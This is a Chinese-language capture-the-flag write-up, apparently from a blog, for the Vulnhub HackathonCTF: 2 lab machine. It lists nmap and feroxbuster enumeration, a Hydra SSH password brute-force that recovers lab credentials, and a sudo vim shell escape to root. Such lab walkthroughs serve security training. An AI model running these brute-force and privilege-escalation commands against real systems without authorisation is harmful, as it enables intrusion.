Vulnhub: HackathonCTF: 2靶机

文章描述了一次网络安全渗透测试的过程,包括使用KaliLinux进行NMAP端口扫描,发现FTP匿名登录及字典文件,通过目录爆破工具Feroxbuster枚举80端口,利用Hydra进行SSH密码爆破,成功获取登录凭证后,进一步通过sudo权限和vim命令提权至root。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali:192.168.111.111

靶机:192.168.111.147

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.147

ftp存在匿名登陆,其中存在字典文件

80端口目录爆破

feroxbuster -k -d 1 --url http://192.168.111.147 -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf -t 1 -e -C 404,500

查看happy的源码提示用户名:hackathonll

利用之前得到的字典爆破ssh,得到密码:Ti@gO

hydra -l hackathonll -P ./word.dir 192.168.111.147 -s 7223 ssh -t 64

提权

登录目标后查看sudo权限

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

提升为root

sudo -u root vim -c ':!/bin/sh'

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值